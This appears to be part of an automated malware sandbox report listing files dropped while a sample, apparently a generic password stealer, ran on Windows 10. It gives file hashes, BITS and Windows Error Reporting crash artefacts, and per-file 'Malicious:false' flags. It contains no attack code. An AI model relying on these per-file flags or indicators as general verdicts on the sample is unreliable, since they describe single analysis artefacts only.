                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1310720
                                                                                                                                                                                          Entropy (8bit):0.7107565798622393
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqm:2JIB/wUKUKQncEmYRTwh06
                                                                                                                                                                                          MD5:26650EFAAE546048641D51C74282E06B
                                                                                                                                                                                          SHA1:D501379C462D5911E73A12D88520FDD05E6926B6
                                                                                                                                                                                          SHA-256:ABEB88646993245C6832DE7AF958AA55F2069075E12D3CD680C10AD368692DF6
                                                                                                                                                                                          SHA-512:1E3BECEE3EC0BE949D5ABD3DFFDB09DC4D98B491B6D33FF573931B04D1E7F61A015E9C05A072E0EE13B7572F65825CA4287AB68FCA72FE0065828F0D924D370F
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x1a0db5ff, page size 16384, Windows version 10.0
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1310720
                                                                                                                                                                                          Entropy (8bit):0.6651319324979795
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:IfqSB2ESB2SSjlK/2502y0IEWBqbMo5g5+Ykr3g16z2UPkLk+kK+UJ8xUJSSiWjP:lazaU+uroc2U5Si6
                                                                                                                                                                                          MD5:4318F9C1DA9F195974A414A2503C0571
                                                                                                                                                                                          SHA1:4CD33F1A484C525A0216A3B8EE6E1443814BD5DC
                                                                                                                                                                                          SHA-256:3D498150EF9A638843A5E15082400AA4F62AE7B068327D033E3CCA74F361E0B5
                                                                                                                                                                                          SHA-512:291C61B17961BEA4A864EB11A29B492899169D1C958103C90A1EF92516381FAEC6CF6C18BB7E4CFB72863023AE51E7D75F671C422CD2196B9DCDB1A793DC8AF8
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:....... .......#.......X\...;...{......................0.e.....&....|.......|..h.b.....&....|..0.e.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{......................................&....|.....................@&....|...........................#......0.e.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):16384
                                                                                                                                                                                          Entropy (8bit):0.07847206448583784
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:ElsetYeJ9U2itklZ5uu4is5t/lGlD+ClillkqqG9lXlZOS:EbzJ9UJ0UGlEVr
                                                                                                                                                                                          MD5:54A9ED1C5F1947F4740D9769174D219E
                                                                                                                                                                                          SHA1:F88AE2C69ADA8762AF980C4D956AB567F0B4B457
                                                                                                                                                                                          SHA-256:F2C97C3037C2855EA6CC902C3CC6435F833B404143E4A5C4B8005E6BD07CCF41
                                                                                                                                                                                          SHA-512:F02EDCAC380D30B46B19C050863D2ABED20EF94FC6BAA19D5014D91C7759DA6FD60368743E862927A87845C6E9459129C694F6F9F5F56666F99BFCB657FEB5DA
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.^.0.....................................;...{.......|..&....|..........&....|..&....|....c.&....|.....................@&....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_0WDZX0ZOOI1PRRIF_df62f32ee59d7ca897a8574ee9a18acb4a2a97_0c92175c_394f91dc-ad3c-4d96-9ece-ab7189c2220a\Report.wer

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                          Entropy (8bit):1.1841782019862874
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:JDo9N+i0xCt3a+z3OlTwyZFnj8BzuiFiZ24lO8u:to9NYxCt3aAocBzuiFiY4lO8u
                                                                                                                                                                                          MD5:9913AB0331D1BA7F7AA6B3A0F40FBDBC
                                                                                                                                                                                          SHA1:E8C3179B129B81CB9A5D90F0C04655A1B9F946CF
                                                                                                                                                                                          SHA-256:6AB5301CFF57390051854E5907914171C1770C85CB4CFCC03A272221D2C2834D
                                                                                                                                                                                          SHA-512:8A1CBFAA0CA232ECB9FEC23920D35ECA246D10A2BA1E4F54AAAF3CCFAFEBFC22F0814C8B6764EEA368A7BF9DFE7E39566F94FA1974F1C2B9C010516F9AB3948A
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.6.0.9.1.5.2.8.9.7.7.7.4.1.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.6.0.9.1.5.2.9.7.7.4.6.1.9.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.9.4.f.9.1.d.c.-.a.d.3.c.-.4.d.9.6.-.9.e.c.e.-.a.b.7.1.8.9.c.2.2.2.0.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.1.d.5.c.9.1.3.-.3.e.3.4.-.4.2.3.3.-.9.0.3.0.-.8.4.3.8.2.1.9.5.b.2.e.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...W.i.n.6.4...P.W.S.X.-.g.e.n...2.5.3.1.6...3.1.0.9.7...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.O.q.o.h.o.j.u.r.o.v.a.y.o.f.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.b.0.-.0.0.0.1.-.0.0.1.4.-.7.d.3.c.-.2.d.d.e.f.1.8.0.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.6.7.0.c.c.9.1.2.6.2.b.3.6.b.d.9.2.0.a.b.3.3.a.f.9.2.1.6.7.5.c.0.0.0.0.0.0.0.0.!.0.0.0.0.6.8.6.a.8.e.6.7.4.e.6.6.1.5.d.5.c.

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_hgzxhw.exe_b7faaa96a846ed7b3f62e65dfab6c1e486782f_1d9feab2_19c46456-23aa-4aef-ace5-ed965f2d70af\Report.wer

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                          Entropy (8bit):1.6611510988196787
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:azbXSUnUFa4olNLNzYvEtM0m8iq6XzuiF9Y4lO8+:az+UnUFaPxmbXzuiF9Y4lO8
                                                                                                                                                                                          MD5:5A18C7715461698F9396A8FE9706675B
                                                                                                                                                                                          SHA1:1D7A883E351622DE5F7DD4831059450800A4E7BB
                                                                                                                                                                                          SHA-256:F1B6BA22A0CBE486C4C725B7CCC305D5D51B020571CA3B7AC83F6DE8B9C7B771
                                                                                                                                                                                          SHA-512:38CE579A08C30BF91BCAE83F1915BF39FF935DE422F49AC39D1EDDFCDE9974FA421356680B9545A7B87F278A672739DE80D8CD5FA37E2149CE1A1A87CA87016A
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.6.0.9.1.6.1.0.6.3.0.0.5.1.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.6.0.9.1.6.1.2.4.1.1.3.2.3.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.c.4.6.4.5.6.-.2.3.a.a.-.4.a.e.f.-.a.c.e.5.-.e.d.9.6.5.f.2.d.7.0.a.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.0.7.d.4.4.2.4.-.0.2.3.f.-.4.a.8.b.-.9.c.1.4.-.e.f.e.a.e.8.a.3.f.6.7.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.h.g.z.x.h.w...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.a.y.a.r.e.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.4.c.-.0.0.0.1.-.0.0.1.4.-.1.4.e.9.-.0.c.0.a.f.2.8.0.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.5.b.1.9.4.8.2.8.6.1.4.0.7.f.4.d.2.1.e.3.d.0.9.d.c.c.7.1.e.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.b.2.6.a.a.7.3.f.4.3.a.4.d.b.9.b.2.1.6.b.9.0.d.1.a.a.3.e.2.e.4.d.6.0.2.f.d.e.8.!.h.g.z.x.h.w...e.x.e.....T.a.r.

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ohvrxt.exe_86725fff1ed7b180dee641e5a46ef7a46642c8a_4c771ea2_ad54622c-237f-402d-82fe-00fa4d7c783d\Report.wer

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                          Entropy (8bit):1.1273943111460467
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:k3aM90UnUVauj3OlTwyZFXj8XzuiF9Z24lO8Y:0aM+UnUVawosXzuiF9Y4lO8Y
                                                                                                                                                                                          MD5:88D2F63E53D7CDA7C1105A5818C23E6B
                                                                                                                                                                                          SHA1:78DABF34A7820D70C3D763817CA24C39C5300A27
                                                                                                                                                                                          SHA-256:B0C96E81AE2737361CBDEB526388B1AE8D52172F5C2A075CE038A9A75EB4C374
                                                                                                                                                                                          SHA-512:71DC194E1F83DD361AB1FFE754023D464EC984CCD6A59686837BEDFB4ED51F4BE8F19C7882FB7038F0B915759815E976226C8E0F3CFA5389DFC7FA11BE441E8D
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.6.0.9.1.6.0.2.6.2.6.5.8.0.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.6.0.9.1.6.0.3.2.8.2.8.3.4.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.d.5.4.6.2.2.c.-.2.3.7.f.-.4.0.2.d.-.8.2.f.e.-.0.0.f.a.4.d.7.c.7.8.3.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.f.4.d.a.c.6.c.-.6.9.5.4.-.4.0.b.a.-.9.3.4.6.-.b.c.8.c.e.0.0.3.e.c.0.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.o.h.v.r.x.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.F.a.y.o...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.6.8.-.0.0.0.1.-.0.0.1.4.-.9.9.2.4.-.f.7.0.9.f.2.8.0.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.7.f.9.2.6.b.4.0.7.c.9.e.0.0.4.2.7.1.3.c.a.8.6.1.0.4.e.f.0.6.a.0.0.0.0.0.0.0.0.!.0.0.0.0.2.9.0.f.c.3.e.5.0.c.f.1.3.a.1.5.9.5.f.1.b.a.3.3.5.7.2.8.5.1.5.3.a.c.9.8.8.3.4.d.!.o.h.v.r.x.t...e.x.e.....T.a.r.g.e.

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_spczxf.exe_e579793d450d0c282ac383c29839632381b814_0d30f733_8509e221-ac0f-4a90-ad7f-f26b5a2b819d\Report.wer

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                          Entropy (8bit):1.6764270165948307
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:P4l4HirGagolNLNzYvEtM0m8iq6rzuiFiY4lO8E:PFHirGanxmbrzuiFiY4lO8
                                                                                                                                                                                          MD5:49285B73747101871617F9CBF88A976A
                                                                                                                                                                                          SHA1:8EA9A50C8ACFAF712479621DF3D1A13C376153F0
                                                                                                                                                                                          SHA-256:4069DE5680D912DF77C608781C3B302FF9343B7F7D82D695AC1351A40145D65A
                                                                                                                                                                                          SHA-512:203D95CFF4F88CFBE575269178A45B80D35237CAA720AB79F5624A20EAC3D3F64FEA6C8493EF5C500872C209A3FFF112435F572E2D5885720A5036A22BD585F6
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.6.0.9.1.5.5.2.3.2.0.2.8.5.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.6.0.9.1.5.5.4.0.7.0.2.9.2.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.5.0.9.e.2.2.1.-.a.c.0.f.-.4.a.9.0.-.a.d.7.f.-.f.2.6.b.5.a.2.b.8.1.9.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.2.8.2.e.b.d.e.-.e.9.3.4.-.4.2.1.9.-.9.f.1.4.-.0.e.c.e.5.c.7.b.b.6.8.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.s.p.c.z.x.f...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.a.y.a.r.e.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.5.c.-.0.0.0.1.-.0.0.1.4.-.f.a.f.3.-.d.3.e.6.f.1.8.0.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.5.b.1.9.4.8.2.8.6.1.4.0.7.f.4.d.2.1.e.3.d.0.9.d.c.c.7.1.e.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.5.0.2.6.4.2.2.e.8.4.b.f.4.4.5.e.2.d.1.4.1.5.2.9.e.2.b.8.0.8.1.8.7.a.3.0.d.9.f.6.!.s.p.c.z.x.f...e.x.e.....T.a.r.g.

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_utntwb.exe_35733fcd6311bab2ecb571498494acca9c46d7_768da9df_56c226de-60c0-45e9-9413-a7b3279b6080\Report.wer

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                          Entropy (8bit):1.6600779069590426
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:pzxeUnUFa4olNLNzYvEtM0m8iq6XzuiF9Y4lO8i:psUnUFaPxmbXzuiF9Y4lO8
                                                                                                                                                                                          MD5:A2DBC864FE5D84A01687FF6AFAFF7CD8
                                                                                                                                                                                          SHA1:159D445855C443F49D458976DCE03FE60147E25E
                                                                                                                                                                                          SHA-256:8DA9DB0330D12BD0B025C6EFCE3C0AAC62138A9BD371C68E1FD80B69E5F44F89
                                                                                                                                                                                          SHA-512:5CD48E44AC9CBCF2CC8E39CDFA00D5CB777BF77C1134307F489D3413C94D5B22B9B0D9514E6E1EEE1D9C0309871D55F49C01B8E1C168529F04CBE8DDFBEB1F8B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.6.0.9.1.6.2.1.9.7.5.6.0.5.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.6.0.9.1.6.2.4.1.1.6.2.4.2.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.6.c.2.2.6.d.e.-.6.0.c.0.-.4.5.e.9.-.9.4.1.3.-.a.7.b.3.2.7.9.b.6.0.8.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.c.4.a.c.d.8.0.-.1.d.c.8.-.4.5.7.c.-.9.5.1.f.-.d.9.6.1.9.5.7.6.6.2.9.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.u.t.n.t.w.b...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.a.y.a.r.e.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.9.c.-.0.0.0.1.-.0.0.1.4.-.b.3.e.2.-.a.e.1.1.f.2.8.0.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.5.b.1.9.4.8.2.8.6.1.4.0.7.f.4.d.2.1.e.3.d.0.9.d.c.c.7.1.e.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.0.2.1.c.7.3.3.e.5.4.4.8.4.3.6.b.3.8.4.b.f.0.d.3.a.0.b.a.8.1.f.4.d.0.d.9.3.f.9.a.!.u.t.n.t.w.b...e.x.e.....T.a.r.

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A76.tmp.dmp

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          File Type:Mini DuMP crash report, 16 streams, Thu Mar 28 09:25:29 2024, 0x1205a4 type
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):599955
                                                                                                                                                                                          Entropy (8bit):3.667110835993566
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:dyugwj4hbQZbicSvJl5tFQO00vEEMjTNzFYXi1CCqrTyBmr6vUPk5yzUb6cTr5A5:cbbEZuvjFQO00m1qr6Hcfl63Q3BofE
                                                                                                                                                                                          MD5:5AAE0F73D7DCB986CA97B19B3C1AE613
                                                                                                                                                                                          SHA1:5B24B46CAD7C79BC7BACD91DC3CE662FAE6249C6
                                                                                                                                                                                          SHA-256:713342B0368EFB2900D4FB3BFC973C8B643EEF229A5886AB3DA7FFB130192AE2
                                                                                                                                                                                          SHA-512:0FC5CDD7CC7088266528FB63BEDE39E9FE9D83DD4BBC103D3AAB0707F3D7EF877F786B879984498521B447D9C6B750418CA4F144E427B732838BC7759A1A4A1B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:MDMP..a..... ........7.f............t...........|...........$....".......:..4"......D...............l.......8...........T............/..............4\.......... ^..............................................................................eJ.......^......Lw......................T............7.f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER2C5C.tmp.WERInternalMetadata.xml

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):8982
                                                                                                                                                                                          Entropy (8bit):3.718457414554005
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:R6l7wVeJPxg6YN3raugmfZTAprw89bi9SfiFWm:R6lXJJg6Ytraugmf9IiIfid
                                                                                                                                                                                          MD5:8CF4BDC269611ACD6B2993A2C6F6116A
                                                                                                                                                                                          SHA1:28722FD90DFA6F1ABE91C9BD3D36DF3CFF976DFB
                                                                                                                                                                                          SHA-256:BCA4200018DD90BA56382CC8934232E05500106A52378D13D86D90D7CC45AC08
                                                                                                                                                                                          SHA-512:8D95D6BF4506531AB65BBB6FC25FEBA84C6639BE64C44BCF9AB9176636F65DE0D50AA30849F8A5260644196F87485929EC366D3B117DE9C54290C95F9FE8FBB9
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.2.<./.P.i.d.

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER2C9B.tmp.xml

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):4957
                                                                                                                                                                                          Entropy (8bit):4.609874656447592
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:cvIwWl8zssJg771I9mOSWpW8VYrYm8M4J5BE6Fbiyq8vsE+64i+ixd:uIjfqI7Zw7VvJYpWR+mXxd
                                                                                                                                                                                          MD5:631C5CB85D048F90356888FDB675F963
                                                                                                                                                                                          SHA1:2E7DA5464EA5A853B0726750DCD3BF9A90C027A0
                                                                                                                                                                                          SHA-256:8BB4341B8128BCB02F19D608D7D8169A76D8531714FC53C35FDE1E11F159F544
                                                                                                                                                                                          SHA-512:88666460FC196180B6150F799A1FA19639B60262E9E1E2030B269E30BA91C5F2B0395A936571C246AD34C214D879A0B313BA8B75840C02B4ABCA63711D13CB1A
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="254908" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER2CB8.tmp.csv

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):77598
                                                                                                                                                                                          Entropy (8bit):3.0274312399529113
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:80m9w/KuCWMId/hv4AxchKIV/ymFyGY2wib905n8YRXMs:8n9qKuIYhv1xchKIV/ymFFbwi50588XH
                                                                                                                                                                                          MD5:E454F80A9A3F31B0FC7C6D768FACCF4F
                                                                                                                                                                                          SHA1:6AD10531D616929B7D2F5108CA6DDE66949CA30B
                                                                                                                                                                                          SHA-256:32DC0106B3C59A7AB17F51C1B6FA89B56BF379DE44A149606D5877944301F46E
                                                                                                                                                                                          SHA-512:2CA97912DA9CEDE7EA7D6D37593053868B461F36972161ABF8A57A4B6B979B4E97E2ABCB51C7B01D9DD7FB65B14BC70EAECA4A8CD86B18619372241495D571B7
                                                                                                                                                                                          Malicious:false
